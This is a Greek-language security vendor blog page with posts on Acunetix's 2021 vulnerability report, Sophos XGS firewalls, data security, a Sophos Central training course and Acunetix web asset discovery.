Η έκθεση της Acunetix περιέχει επίσης δεδομένα σχετικά με άλλες γνωστές ευπάθειες και ζητήματα ασφάλειας λογισμικού, όπως το buffer overflow, η άρνηση εξυπηρέτησης υπηρεσίας και ευπάθειες DDoS, ζητήματα που σχετίζονται με τον έλεγχο πρόσβασης και ευπάθειες στον έλεγχο ταυτότητας, όπως οι αδύναμοι κωδικοί πρόσβασης, οι εσφαλμένες διαμορφώσεις web server και άλλα. Στην περίπτωση όλων αυτών των ζητημάτων, η τάση είναι ίδια: παρατηρείται μικρή αύξηση στους αριθμούς.

Προσοχή στις συνέπειες

Συμπερασματικά, η έκθεση Web Application Vulnerability Report 2021 τονίζει και πάλι τη σημασία της σάρωσης για διαδικτυακές ευπάθειες, ειδικά στην εποχή της ασθένειας COVID-19 και της τηλεργασίας. Ζητήματα που εντοπίστηκαν από σαρωτές όπως ο Acunetix μπορεί να έχουν σοβαρές συνέπειες και να οδηγήσουν στην έκθεση ευαίσθητων δεδομένων από την πλευρά του διακομιστή (server-side), όπως παραβιάσεις λογαριασμών χρηστών, κλοπή πληροφοριών πιστωτικών καρτών, παραβιάσεις ασφαλείας back-end βάσεων δεδομένων καθώς και επιθέσεις στα προγράμματα περιήγησης των θυμάτων από πλευράς client (client-side).

Διαβάστε την πλήρη έκθεση.

Πηγή: Acunetix

22

Απρ

Η Sophos παρουσίασε πρόσφατα την πρώτη από τις νέες συσκευές next-gen firewall της σειράς XGS με το Sophos Firewall OS 18.5.

Για τους διαχειριστές δικτύου, αυτή η πλήρως ανασχεδιασμένη πλατφόρμα hardware βάζει τέλος στο δίλημμα: πως γίνεται να αυξηθεί η προστασία των σημερινών ετερογενών, κατανεμημένων και κρυπτογραφημένων δικτύων χωρίς να επιβαρυνθεί η απόδοση του δικτύου.

Σε συνδυασμό με την εξαιρετική ελκυστική τιμή, η νέα σειρά XGS φέρνει τα πάνω-κάτω στον χώρο  ανακατασκευή του καταστρώματος στον χώρο των δικτυακών firewalls.

Παρακάτω, θα βρείτε τα τρία βασικά highlights της νέας κυκλοφορίας της Sophos.

Αρχιτεκτονική διπλού επεξεργαστή – powered by Xstream

Κάθε συσκευή της σειράς XGS έχει «δύο καρδιές που χτυπούν» στον πυρήνα της: μια υψηλής απόδοσης πολυπύρηνη x86 CPU και έναν επεξεργαστή Xstream Flow για την έξυπνη επιτάχυνση των εφαρμογών «εκφορτώνοντας» την επαληθευμένη και αξιόπιστη κίνηση δεδομένων στο FastPath.

Αυτή η αρχιτεκτονική επιτρέπει στη Sophos να συνεχίσει να διατηρεί την ίδια ευελιξία όσον αφορά την επέκταση και την κλιμάκωση της προστασίας που προσφέρουν τα firewalls που βασίζονται σε επεξεργαστές αρχιτεκτονικής x86, παρέχοντας παράλληλα ενισχυμένη απόδοση, η οποία δεν μαστίζεται από τους περιορισμούς ορισμένων παλαιότερων σχεδιασμών.

Για παράδειγμα, με τους προγραμματιζόμενους επεξεργαστές Xstream Flow, η Sophos έχει τη δυνατότητα να επεκτείνει τις δυνατότητες «εκφόρτωσης» σε μελλοντικές εκδόσεις λογισμικού, παρέχοντας πρόσθετες βελτιώσεις απόδοσης χωρίς να χρειάζεται να γίνουν αλλαγές στο hardware.

Προστασία και απόδοση

Όσο και αν θέλουμε να μιλάμε για ταχύτητες και τροφοδοσίες (feeds) στον χώρο των firewalls, τα επιπλέον περιθώρια απόδοσης στη σειρά XGS υπάρχουν για έναν σκοπό: την προστασία.

Με το 90% περίπου της δικτυακής κίνησης να είναι κρυπτογραφημένο (πηγή: Google Transparency Report) και σχεδόν το 50% του κακόβουλου λογισμικού που χρησιμοποιεί TLS για να καταφέρνει να αποφύγει την ανίχνευση (πηγή: SophosLabs), οι οργανισμοί αφήνουν σημαντικά τυφλά σημεία στην δικτυακή ορατότητα τους με το να αφήνουν απενεργοποιημένη την επιθεώρηση TLS.

Μόνο από την τηλεμετρία της Sophos, προκύπτει ότι περίπου το 90% των οργανισμών δεν έχουν ενεργοποιήσει την επιθεώρηση TLS στα τείχη προστασίας τους. Ακόμα κι αν ληφθεί υπόψη ότι ορισμένοι από αυτούς ενδέχεται να έχουν ξεχωριστές λύσεις για την πραγματοποίηση επιθεώρησης TLS, το πιθανότερο είναι να πρόκειται για την μειονότητα και όχι την πλειονότητα. Και εκτός από τον μεγάλο κίνδυνο που εγκυμονεί κάτι τέτοιο, είναι πολύ δύσκολο να δημιουργήσετε μια πολιτική για την κίνηση που να φαίνεται ως «general» ή «unknown».

Και πριν φωνάξετε όλοι, «μα η επιθεώρηση TLS δημιουργεί προβλήματα στο Internet» αρκεί να σας πούμε ότι το Sophos Firewall περιλαμβάνει εγγενή υποστήριξη για TLS 1.3 και παρέχει ένα περιβάλλον χρήσης που δείχνει με σαφήνεια αν η κίνηση προκάλεσε προβλήματα και πόσοι ήταν οι χρήστες που επηρεάστηκαν. Με μερικά μόνο κλικ, μπορείτε να εξαιρέσετε προβληματικές ιστοσελίδες και εφαρμογές χωρίς να επιστρέψετε σε κάποιο ανεπαρκές επίπεδο προστασίας.

Η Sophos έχει το προβάδισμα

Η σειρά XGS περιλαμβάνει πολλούς form factors που ξεπερνούν κατά πολύ στον τομέα της «τιμής ανά προστατευμένο Mbps» πολλά ανταγωνιστικά μοντέλα.

Οι συσκευές της σειράς XGS είναι εξοπλισμένες με υψηλής ταχύτητας interfaces που καλύπτουν στον μέγιστο βαθμό τις διαφορετικές απαιτήσεις συνδεσιμότητας των σημερινών επιχειρήσεων, μικρών και μεγάλων. Πέρα από τις ενσωματωμένες θύρες χαλκού, οπτικών ινών και άλλων σε κάθε μοντέλο, προσφέρονται μονάδες add-on που παρέχουν την απαραίτητη ευελιξία για να προσαρμόσετε τη συνδεσιμότητα της συσκευής στις ιδιαιτερότητες του περιβάλλοντος σας – σήμερα όσο και μελλοντικά.

Η σειρά XGS ενσωματώνεται περαιτέρω με άλλες συσκευές υποδομής, όπως είναι τα access points APX και οι συσκευές Remote Ethernet SD-RED. Και με τα νέα Zero-Trust Network Access και access layer network switches να έρχονται αργότερα φέτος, η Sophos φέρνει την ασφάλεια δικτύου σε κάθε άκρη.

Sophos Firewall OS v18.5

Οι νέες συσκευές της Sophos έρχονται με την τελευταία έκδοση λογισμικού v18.5, η οποία όχι μόνο παρέχει υποστήριξη για το νέο υλικό, αλλά περιλαμβάνει και όλες τις εκδόσεις συντήρησης 18.x – και επομένως πολλές νέες δυνατότητες και βελτιώσεις ασφαλείας – από την ώρα που έγινε διαθέσιμη η v18.

Για περισσότερες πληροφορίες σχετικά με το τείχος προστασίας Sophos και τη σειρά XGS ή για να ζητήσετε κάποια προσφορά, επισκεφθείτε τη διεύθυνση Sophos.com/Firewall ή Sophos.com/Compare-XGS.

Πηγή: Sophos

20

Απρ

Τι είναι η ασφάλεια δεδομένων;

Γενικά, με την «ασφάλεια δεδομένων» περιγράφουμε όλα όσα περιβάλλουν την προστασία ψηφιακών δεδομένων από καταστροφικές δυνάμεις ή ανεπιθύμητες ενέργειες μη εξουσιοδοτημένων χρηστών, όπως είναι κάποια διαδικτυακή επίθεση ή παραβίαση δεδομένων. Παρά  τον «γενικό αυτό ορισμό», ένα πράγμα που δεν είναι η ασφάλεια δεδομένων είναι μία μεμονωμένη λύση που «ισχυρίζεται» ότι μπορεί να «κάνει τα πάντα». Αντίθετα, η ασφάλεια δεδομένων είναι μια νοοτροπία και ένα σταθερό, συντονισμένο σύνολο προσπαθειών και λύσεων λογισμικού που εφαρμόζονται σε έναν οργανισμό και έχουν σχεδιαστεί για την ολοκληρωμένη προστασία των ευαίσθητων δεδομένων που μεταδίδονται κάθε μέρα και σε όλα τα στάδια του ταξιδιού τους.

Γιατί έχει σημασία η ασφάλεια δεδομένων

Αν τα δεδομένα σας είναι ευάλωτα στους κυβερνοεγκληματίες ή ακόμα και στο ανθρώπινο λάθος, τότε θα πρέπει να είστε και διατεθειμένοι να το πληρώσετε – και από οικονομική άποψη, και από άποψη πόρων προσωπικού και από την άποψη της ανοικοδόμησης της φήμης της εταιρείας σας σε περίπτωση παραβίασης από εσωτερικούς ή εξωτερικούς παράγοντες. Σύμφωνα με μία μελέτη της IBM, το μέσο κόστος μιας παραβίασης δεδομένων εκτιμάται σε $3,92 εκατομμύρια. Για τις βιομηχανίες μάλιστα που αποτελούν τους μεγαλύτερους στόχους, εξαιτίας των πολύτιμων προσωπικών δεδομένων που κατέχουν, όπως είναι επιχειρήσεις και οργανισμοί από τον χρηματοπιστωτικό κλάδο, τον κλάδο της υγειονομικής περίθαλψης ή τον κλάδο του λιανικού εμπορίου, το κόστος μπορεί να είναι σημαντικά υψηλότερο. Ανεξάρτητα από τον κλάδο στον οποίο ανήκετε, αν αποθηκεύετε ή μεταφέρετε ευαίσθητα δεδομένα, ο οργανισμός σας αποτελεί ελκυστικό στόχο.

Τι είναι ο κύκλος ζωής των δεδομένων;

Όπως μπορείτε να δείτε από την παρακάτω εικόνα, ο κύκλος ζωής των δεδομένων έχει επτά διαφορετικά στάδια που λειτουργούν ως μια συνεχής, και όχι στατική, διαδικασία. Για να εξασφαλιστεί η πλήρης ασφάλεια των δεδομένων, θα πρέπει κάθε στάδιο ασφαλείας να περιβάλλεται από ένα επίπεδο προστασίας από άκρη σε άκρη.

Που βρίσκονται τα δεδομένα στο πλαίσιο της εταιρικής ασφάλειας;

Όπως μπορείτε να δείτε, η ασφάλεια δεδομένων αποτελεί τη βάση από όπου αρχίζουν όλες οι προσπάθειες ασφαλείας. Στην περίπτωση που τα δεδομένα δεν είναι προστατευμένα εξαρχής, η ασφάλεια των εφαρμογών, των τερματικών συσκευών, των δικτύων και της περιμέτρου δεν έχει και ιδιαίτερη σημασία. Ακριβώς για αυτό το λόγο, για την υποστήριξη όλων αυτών των μέτρων ασφαλείας απαιτείται μία ισορροπημένη προσέγγιση από προληπτικές και αντιδραστικές ενέργειες με απώτερο σκοπό να διασφαλιστεί ότι τα κρίσιμα περιουσιακά στοιχεία της επιχείρησής σας παραμένουν προστατευμένα.

Λαμβάνοντας υπόψη ότι τα δεδομένα είναι τόσο πολύτιμα, αποτελεί έκπληξη που οι εταιρείες επενδύουν στην ασφάλεια δεδομένων μόλις το 7% του προϋπολογισμού πληροφορικής τους σύμφωνα με μία έρευνα της Verizon. Για περισσότερες λεπτομέρειες σχετικά με το που θα μπορούσαν να επικεντρωθούν οι προϋπολογισμοί πληροφορικής για καλύτερη ασφάλεια δεδομένων διαβάστε παρακάτω.

Ποια είναι τα εμπόδια στην ασφάλεια δεδομένων;

Οι σημερινοί οργανισμοί ανταλλάσσουν δεδομένα σε μεγαλύτερες ποσότητες και ταχύτερους  ρυθμούς από ποτέ και το κάνουν σε πολύπλοκα, υβριδικά περιβάλλοντα πληροφορικής. Επιπλέον, η κατάσταση με το απομακρυσμένο ή μερικώς απομακρυσμένο εργατικό δυναμικό που προέκυψε από την πανδημία COVID-19 φαίνεται πως θα συνεχίσει να υφίσταται κατά κάποιο τρόπο σε πολλές επιχειρήσεις για ορισμένο χρονικό διάστημα – πράγμα που αυξάνει τα σημεία που παραμένουν ευάλωτα για τα δεδομένα σας. Πέρασαν οι μέρες που ελπίζατε για το καλύτερο με κάθε συνημμένο μηνύματος ηλεκτρονικού ταχυδρομείου. Σήμερα, οι μεταφορές δεδομένων μπορεί να είναι μαζικές, περίπλοκες και αφορούν μυριάδες αποστολές σε τοπικές τοποθεσίες και επομένως βρίσκονται εκτεθειμένα σε υποκλοπές, ανθρώπινα λάθοι ή άλλες κυβερνοεπιθέσεις εξαιτίας της αξίας των δεδομένων.

 Αυτά τα δεδομένα υπόκεινται επίσης σε αυστηρότερα πρότυπα συμμόρφωσης και απορρήτου, τα οποία έχουν σχεδιαστεί για την προστασία τόσο των ατόμων όσο και των επιχειρήσεων. Οι οργανισμοί που αποτυγχάνουν να προστατεύσουν σωστά τα δεδομένα τους, βρίσκονται αντιμέτωποι με τεράστιο κόστος, που μπορεί να βλάψει τόσο τα ταμεία τους όσο και την υστεροφημία τους. Τα ανθρώπινα λάθη, το κυβερνοέγκλημα και η ανεπαρκής τεχνολογία, όλα παίζουν τον ρόλο τους στο γιατί τα δεδομένα μένουν ανασφαλή. Μία σωστή ωστόσο στρατηγική ασφαλείας μπορεί να αντιμετωπίσει αποτελεσματικά όλους τους παραπάνω παράγοντες. Δίνοντας έμφαση στην ασφάλεια δεδομένων από οργανωτική άποψη και συνδυάζοντας ισχυρές, ενσωματωμένες και δωρεάν λύσεις λογισμικού, μπορεί να σας προσφέρει την end-to-end προστασία που χρειάζεστε.

Διευθετώντας το ζήτημα της ασφάλειας δεδομένων με μια σουίτα λύσεων

Για μια πιο σύγχρονη στάση ασφάλειας δεδομένων, πρέπει να διασφαλίσετε ότι οι λύσεις που έχετε επιλέξει πληρούν τα ακόλουθα μέτρα ασφαλείας:

  1. Προσδιορισμός και διαβάθμιση αρχείων που ενδέχεται να περιέχουν ευαίσθητα δεδομένα
  2. Ανακάλυψη και πρόληψη διαρροών ευαίσθητων πληροφοριών εκτός του οργανισμού
  3. Ασφάλεια και προστασία ευαίσθητων δεδομένων που κοινοποιούνται τόσο εντός όσο και εκτός του οργανισμού

Επιπλέον, οι λύσεις θα πρέπει να μπορούν να ενσωματώνονται και να εφαρμόζονται γρήγορα και με φιλικό προς τον χρήστη τρόπο, αφενός για την ενθάρρυνση της υιοθέτησης τους, αφετέρου για τη μείωση του φόρτου εργασίας του προσωπικού και του αντικτύπου τους στην παραγωγικότητα. Με την προστασία των δεδομένων καθ’ όλη τη διάρκεια του κύκλου ζωής τους, μπορείτε να μειώσετε σημαντικά τον κίνδυνο.

  1. Προσδιορισμός και διαβάθμιση των δεδομένων σας

Η βάση μίας στέρεης στρατηγικής ασφάλειας δεδομένων ξεκινά με τον προσδιορισμό και την διαβάθμιση του είδους πληροφοριών που χρειάζεται να προστατεύσετε, συμπεριλαμβανομένων κρίσιμης σημασίας αδόμητων δεδομένων, όπως είναι η πνευματική ιδιοκτησία. Με αυτό το βήμα, κλειδώνετε τις βασικές παραμέτρους ελέγχου και διαχείρισης που απαιτούνται για να διασφαλίσετε συμμόρφωση. 

Είτε χρειάζεται να προστατεύσετε δημόσιες, οικονομικές, προσωπικές πληροφορίες (PII) είτε περισσότερα, ο προσδιορισμός και η διαβάθμιση των δεδομένων για την προστασία τους, βάζει τα θεμέλια για τα πρόσθετα επίπεδα ασφαλείας που απαιτείται να εφαρμόσετε για να συνεχίσετε να τα προστατεύετε και κατά τη διάρκεια του ταξιδιού τους.

  1. Εντοπισμός και πρόληψη διαρροών δεδομένων

Θα συμβεί. Ένας υπάλληλος θα στείλει κατά λάθος ευαίσθητα δεδομένα στο λάθος άτομο ή ενδέχεται να μεταβιβάσει ένα κατά τα άλλα «ασφαλές» έγγραφο που περιέχει όμως κρυφά μεταδεδομένα που θα μπορούσαν να θέσουν σε κίνδυνο τα πρότυπα συμμόρφωσης ή απορρήτου σας. Υπάρχουν πολλά τέτοια σενάρια που θα μπορούσαν να θέσουν σε κίνδυνο τον οργανισμό σας, εκτός και αν διαθέτετε μια λύση για την ανίχνευση και τον «καθαρισμό» των δεδομένων σε πραγματικό χρόνο, πριν από την αποστολή τους στο cloud ή σε τρίτους, προτού δημιουργηθούν συνθήκες παραβίασης.

  1. Ασφαλίστε και προστατεύστε τα δεδομένα σας

Αφού βεβαιωθείτε ότι τα δεδομένα σας έχουν προσδιοριστεί, ταξινομηθεί, ενδεχομένως «καθαριστεί» από ευαίσθητα δεδομένα και έχουν εγκριθεί για αποστολή από εξουσιοδοτημένους χρήστες, αυτά τα δεδομένα θα πρέπει να προστατεύονται καθώς αποστέλλονται ή μεταφέρονται για να απολαμβάνετε πραγματική ασφάλεια δεδομένων από άκρη-σε-άκρη. Ένας από τους απλούστερους τρόπους για να το κάνετε αυτό είναι με τη χρήση μίας λύσης διαχειριζόμενης μεταφοράς αρχείων (MFT). Το MFT «κλειδώνει» τα δεδομένα σας στα σημεία που είναι περισσότερο ευάλωτα – όταν χρησιμοποιούνται από άλλους και καθώς ταξιδεύουν προς τον προορισμό τους σε μη διαχειριζόμενα domains, συσκευές ή εφαρμογές. 

Η πολυεπίπεδη εφαρμογή λύσεων ασφάλειας δεδομένων αποτελεί μία προληπτική προσέγγιση για την προστασία των ευαίσθητων δεδομένων σας. Διαβάστε παρακάτω για περισσότερες λεπτομέρειες.

Η πολυεπίπεδη ασφάλεια διασφαλίζει την προστασία δεδομένων

Η ασφάλεια δεδομένων είναι τόσο στέρεη όσο και τα διάφορα στοιχεία που την υποστηρίζουν. Η εφαρμογή στιβαρών, αποδεδειγμένων λύσεων για να διασφαλίσετε ότι τα ευαίσθητα δεδομένα σας παραμένουν προστατευμένα από την αρχή έως το τέλος είναι μια προληπτική προσέγγιση. Η σουίτα λύσεων ασφάλειας δεδομένων της HelpSystems παρέχει το εύρος προστασίας δεδομένων που χρειάζεστε, και συμπεριλαμβάνει δυνατότητες προσδιορισμού και διαβάθμισης δεδομένων, προστασία από απώλεια δεδομένων, ασφαλή μεταφορά αρχείων και πολλά άλλα.

Πηγή: Boldon James

16

Απρ

Αυτό το τριήμερο πρόγραμμα εκπαίδευσης παρέχει μια εις βάθος μελέτη του Sophos Central, και σχεδιάστηκε για έμπειρους επαγγελματίες τεχνικούς που σκοπεύουν να προγραμματίσουν, να εγκαταστήσουν, να διαμορφώσουν και να υποστηρίξουν την ανάπτυξη του σε παραγωγικά περιβάλλοντα. Αποτελείται από παρουσιάσεις και πρακτικές εργαστηριακές ασκήσεις για την ενίσχυση της διδακτικής ύλης και του περιεχομένου ενώ ηλεκτρονικά αντίγραφα των εγγράφων για το μάθημα θα παρέχονται σε κάθε εκπαιδευόμενο μέσω της ηλεκτρονικής πύλης. Το μάθημα αναμένεται να διαρκέσει 3 μέρες για να ολοκληρωθεί, εκ των οποίων περίπου 9 ώρες θα δαπανηθούν για πρακτικές ασκήσεις.

Προαπαιτούμενα

Πριν από την παρακολούθηση του μαθήματος, οι συμμετέχοντες θα πρέπει να έχουν:

  • Ολοκληρώσει τα Sophos Central Endpoint και Server Protection και θα πρέπει να έχουν περάσει τις εξετάσεις Certified Engineer
  • Εμπειρία με δίκτυωση Windows networking και ικανότητα επίλυσης προβλημάτος
  • Καλή κατανόηση της ασφάλειας IT
  • Εμπειρία χρήσης του command line στο Linux για απλές εργασίες
  • Εμπειρία διαμόρφωσης Active Directory Group Policies
  • Εμπειρία στη δημιουργία και στη διαχείριση εικονικών servers ή desktop

Απευθυνόμενο κοινό:

Το συγκεκριμένο τριήμερο πρόγραμμα εκπαίδευσης παρέχει μια εις βάθος μελέτη του Sophos Central, και σχεδιάστηκε για έμπειρους επαγγελματίες τεχνικούς που σκοπεύουν να προγραμματίσουν, να εγκαταστήσουν, να διαμορφώσουν και υποστηρίξουν την ανάπτυξη του σε παραγωγικά περιβάλλοντα. Επίσης απευθύνεται σε άτομα που θέλουν να αποκτήσουν την πιστοποίηση Sophos Central Certified Architect.

Στόχοι:

Μετά την ολοκλήρωση αυτού του μαθήματος, οι εκπαιδευόμενοι θα είναι σε θέση να:

  • Σχεδιάζουν μία εγκατάσταση λαμβάνοντας υπόψη όλες τις παραμέτρους και μεταβλητές
  • Αναλαμβάνουν μία εγκατάσταση πολλαπλών τοποθεσιών κατάλληλη για το περιβάλλον ενός πελάτη
  • Εξηγούν τη λειτουργία βασικών στοιχείων, να γνωρίζουν τον τρόπο λειτουργίας τους αλλά και πως να τα διαμορφώνουν
  • Ανιχνεύουν την πηγή των μολύνσεων και να καθαρίζουν τις μολυσμένες συσκευές
  • Εκτελούν προκαταρκτικά troubleshooting καθώς και να παρέχουν βασική υποστήριξη σε περιβάλλοντα πελατών

Πιστοποίηση

Για να λάβουν την πιστοποίηση Sophos Certified Architect, οι εκπαιδευόμενοι θα πρέπει να δώσουν εξετάσεις και να περάσουν την ηλεκτρονική αξιολόγηση. Η αξιολόγηση δοκιμάζει τις γνώσεις τόσο για το περιεχόμενο που παρουσιάστηκε όσο και για το περιεχόμενο σε πρακτικό επίπεδο. Το ποσοστό επιτυχίας για την αξιολόγηση είναι 80% και περιορίζεται σε 3 προσπάθειες.

Διάρκεια: 3 ημέρες

Περιεχόμενο προγράμματος εκπαίδευσης

  • Module 1: Deployment Scenarios (60 mins)
  • Module 2:Client Deployment Methods (65 mins)
  • Module 3:Endpoint Protection Policies (80 mins)
  • Module 4:Server Protection Policies (30 mins)
  • Module 5:Protecting Virtual Servers (60 mins)
  • Module 6:Logging and Reporting (45 mins)
  • Module 7: Managing Infections (45 mins)
  • Module 8: Endpoint Detection and Response (30mins)
  • Module 9:Management (65 mins)

Περιεχόμενο Εκπαιδευτικού Μαθήματος

Module 1: Deployment Scenarios (60 λεπτά)

    • Identify some of the common challenges when deploying Central
    • Deploy Update Caches – Set up Message Relays
    • Configure AD Sync Utility
    • Identify where Update Caches and Message Relays should be used
    • Labs (45 mins)
      • Register and activate a Sophos Central evaluation
      • Install Server Protection
      • Install and Configure AD Sync Utility
      • Deploy an Update Cache and Message Relay

Module 2: Client Deployment Methods (65-75 λεπτά)

  • Identify the recommended steps for deploying Sophos Central
  • Explain the installation process, and identify the different types of installer
  • Automate deployment for Windows, Linux and Mac computers
  • Migrate endpoints from Enterprise Console
  • Locate installation log files
  • Remove third-party products as part of a deployment
  • Labs (75-90 mins)
    • Enable Server Lockdown
    • Deploy using Active Directory Group Policy
    • Use the Competitor Removal Tool
    • Deploy to a Linux Server using a Script

Module 3: Endpoint Protection Policies (80-90 λεπτά)

  • Describe the function and operation of each of the components that make up an Endpoint Protection and Intercept X
  • Configure policies to meet a customer’s requirements and follow best practice
  • Test and validate Endpoint Protection
  • Configure exclusions
  • Configure Data Loss Prevention
  • Labs (100-120 mins)
    • Test Threat Protection Policies
    • Configure and Test Exclusions
    • Configure Web Control Policies
    • Configure Application Control Policies
    • Data Control Policies
    • Configure and test Tamper Protection

Module 4: Server Protection Policies (30 λεπτά)

  • Configure Server Protection Policies
  • Configure and Manage Server Lockdown
  • Labs (65-75 mins)
    • Configure Sever Groups and Policies
    • Manage Server Lockdown
    • Test Linux Server Protection

Module 5: Protecting Virtual Servers (60 λεπτά)

  • Connect AWS and Azure accounts to Sophos Central – Deploy Server Protection to AWS and Azure
  • Deploy and Manage Sophos for Virtual Environments
  • Labs (60 mins)
    • Download the installer for the Security Virtual Machine
    • Install the Security Virtual Machine (SVM) on a Hyper-V Server
    • Configure Threat Protection policies to apply to the Security VMs and the Guest VMs they protect
    • Perform a manual installation of the Guest VM Agent and view logs
    • Test and configure a script to deploy the GVM Agent
    • Manage Guest VMs from the Central Console
    • Test Guest VM Migration

Module 6: Logging and Reporting (45 λεπτά)

  • Explain the types of alert in Sophos Central, and be able to read an RCA
  • Use the Sophos Central logs and reports to check the health of your estate
  • Export data from Sophos Central into a SIEM application
  • Locate client log files on Windows, Mac OS X and Linux
  • Labs (55-60 mins)
    • Generate and analyze an RCA
    • Configure SIEM with Splunk

Module 7: Managing Infections (45-60 λεπτά)

  • Identify the types of detection and their properties
  • Explain how computers might become infected
  • Identify and use the tools available to cleanup malware
  • Explain how the quarantine works and manage quarantined items
  • Cleanup malware on a Linux Server
  • Labs (40 mins)
    • Source of Infection Tool
    • Release a File from SafeStore
    • Disinfect a Linux Server

Module 8: Endpoint Detection and Response (30 λεπτά)

  • Explain what EDR is and how it works
  • Demonstrate how to use threat cases and run threat searches
  • Explain how to use endpoint isolation for admin initiated and automatic isolation
  • Demonstrate how to create a forensic snapshot and interrogate the database
  • Labs (30 mins)
    • Create a forensic snapshot and interrogate the database
    • Run a threat search and generate a threat case

Module 9: Management (65 λεπτά)

  • Use the Controlled Updates policies appropriately
  • Enable multi-factor authentication
  • Use the Enterprise Dashboard to manage multiple sub-estates
  • Identify the benefits of the Partner Dashboard
  • Identify common licensing requirements
  • Labs (25 mins)
    • Enable Manually Controlled Updates
    • Enable Multi-Factor Authentication

Πρόγραμμα

Εκπαιδευτής: Μιχάλης Ελευθέρογλου

1η Μέρα, Τρίτη 11 Μαΐου, 2021

9:30-10:30 Deployment Scenarios

10:30-10:45 Διάλειμμα

10:45-11:30 Εργαστήρια

11:30-11:45 Διάλειμμα

11:45-13:00 Client Deployment Methods

13:00-14:00 Διάλειμμα για γεύμα

14:00-15:30 Εργαστήρια

15:30-15:45 Διάλειμμα

15:45-17:15 End Point Policies

2η Μέρα, Τετάρτη 12 Μαΐου, 2021

9:30-11:15 Εργαστήρια

11:15-11:30 Διάλειμμα

11:30-12:00 Server Protection Policies

12:00-12:15 Διάλειμμα

12:15-13:30 Εργαστήρια

13:30-14:30 Διάλειμμα για γεύμα

14:30-15:30 Protecting Virtual servers

15:30-15:45 Διάλειμμα

15:45-16:45 Εργαστήρια

16:45-17:30 Logging and Reporting

3η Μέρα, Πέμπτη 13 Μαΐου, 2021

9:30-10:30 Εργαστήρια

10:30-10:45 Διάλειμμα

10:45- 11:30 Managing Infections

11:30-12:00 Εργαστήρια

12:00-12:10 Διάλειμμα

12:10-12:40 Endpoint Detection and Response

12:40-13:45 Management

13:45-14:45 Διάλειμμα για γεύμα

14:45-17-15 Labs and Exams

15

Απρ

Η τελευταία έκδοση του Acunetix εισάγει το web asset discovery – έναν μηχανισμό που σας επιτρέπει να βρίσκετε αυτόματα ιστοσελίδες και διαδικτυακές εφαρμογές, οι οποίες ενδεχομένως ανήκουν στον οργανισμό σας. Έτσι, μπορείτε να αποφασίσετε αν είναι απαραίτητο για αυτά τα στοιχεία να καλύπτονται από τις διαδικασίες ασφαλείας που έχετε για τις διαδικτυακές εφαρμογές σας.

Γιατί χρειάζεστε το web asset discovery;

Οι πολύ μικρές εταιρείες ή όσες ιδρύθηκαν πρόσφατα γνωρίζουν συνήθως κάθε στοιχείο που δημιουργούν και κατέχουν. Παρόλα αυτά, για όσο μεγαλύτερο διάστημα υφίσταται ένας οργανισμός και όσο εξελίσσεται μεγαλώνοντας, άλλο τόσο μεγαλύτερη είναι και η πιθανότητα να «ξεχαστούν» ή να «χαθούν» ορισμένα περιουσιακά στοιχεία.

Στο πλαίσιο μίας πρώτης έρευνας της Acunetix, διαπιστώθηκε ότι οι περισσότεροι μεσαίου μεγέθους οργανισμοί ανακάλυψαν διαδικτυακά περιουσιακά στοιχεία που έπρεπε να προστατευθούν. Οι πιο κοινές αιτίες για την «απώλεια» ή την «εξαφάνιση» διαδικτυακών περιουσιακών στοιχείων είναι:

  • Η απουσία διαχείρισης κύκλου ζωής για τα διαδικτυακά περιουσιακά στοιχεία. Για παράδειγμα, πολλά στοιχεία μάρκετινγκ που δεν είναι πλέον σημαντικά παραμένουν στο διαδίκτυο.
  • Απουσία καθολικών διαδικασιών ασφαλείας. Στη περίπτωση ενός μεγάλου οργανισμού για παράδειγμα, ένα μικρό τμήμα ενδέχεται να δημιουργεί διαδικτυακά περιουσιακά στοιχεία χρησιμοποιώντας ένα εργαλείο όπως το WordPress όταν το μεγαλύτερο μέρος του οργανισμού αγνοεί την ύπαρξη τέτοιων διαδικτυακών στοιχείων.
  • Εσωτερικές εργασίες. Μία ομάδα ή ένα τμήμα ενδέχεται για παράδειγμα να χρησιμοποιεί μία διαδικτυακή εφαρμογή για τις εσωτερικές διαδικασίες του, ωστόσο αυτή η εφαρμογή μπορεί να είναι προσβάσιμη εκτός του οργανισμού και παντελώς άγνωστη στα υπόλοιπα τμήματα.
  • Αλλαγές στο προσωπικό. Για παράδειγμα, ένας πρώην υπάλληλος ενδέχεται να έχει δημιουργήσει έναν διαφημιστικό ή προωθητικό χώρο για μια καμπάνια που δεν παρέδωσε στην εταιρεία πριν αποχωρήσει από αυτήν.
  • Συγχωνεύσεις και εξαγορές. Για αρκετούς οργανισμούς, η συγχώνευση μεταδεδομένων για όλα τα διαδικτυακά στοιχεία όλων των τμημάτων τους αποτελεί δύσκολη υπόθεση.
  • Εξωτερικοί εργολάβοι. Λάβετε υπόψη σας την περίπτωση να έχετε προσλάβει έναν εξωτερικό εργολάβο για τη δημιουργία μίας ιστοσελίδας ή μίας διαδικτυακής εφαρμογής και να έχει αφήσει εκτεθειμένη και δημοσίως προσβάσιμη μία δοκιμαστική έκδοση του προϊόντος που ζητήσατε να κατασκευάσει για λογαριασμό σας.

Γιατί χρειάζονται προστασία όλα τα περιουσιακά στοιχεία σας;

Το ξέρετε ότι ακόμα και ένα παροπλισμένο ή απαρχαιωμένο, δευτερευούσης σημασίας περιουσιακό στοιχείο μπορεί να αποτελέσει σημαντική απειλή για την ασφάλεια της επιχείρησης σας; Μία ιστοσελίδα για παράδειγμα που βασίζεται στο WordPress, η οποία δημιουργήθηκε για μια προωθητική καμπάνια που έλαβε χώρα πριν από 2 χρόνια και παραμένει δημοσίως προσβάσιμη μέσω ενός ειδικού domain και όχι μέσω του domain της επιχείρησης σας, μπορεί να μοιάζει αβλαβής αλλά δεν είναι.

Ας υποθέσουμε τώρα ότι αυτή η εγκαταλελειμμένη τοποθεσία WordPress έχει μια ευπάθεια cross-scripting (XSS) που δεν έχει ενημερωθεί/ επιδιορθωθεί. Κάποιος εισβολέας θα μπορούσε να αξιοποιήσει αυτή την ευπάθεια για να εξαπολύσει μία επίθεση ηλεκτρονικού «ψαρέματος». Το domain μάλιστα που χρησιμοποιήσατε για την δική σας καμπάνια πριν από 2 χρόνια, στα χέρια του κυβερνοεγκληματία, γίνεται εργαλείο για μία μεγάλη επίθεση ενάντια σε άλλες εταιρείες.

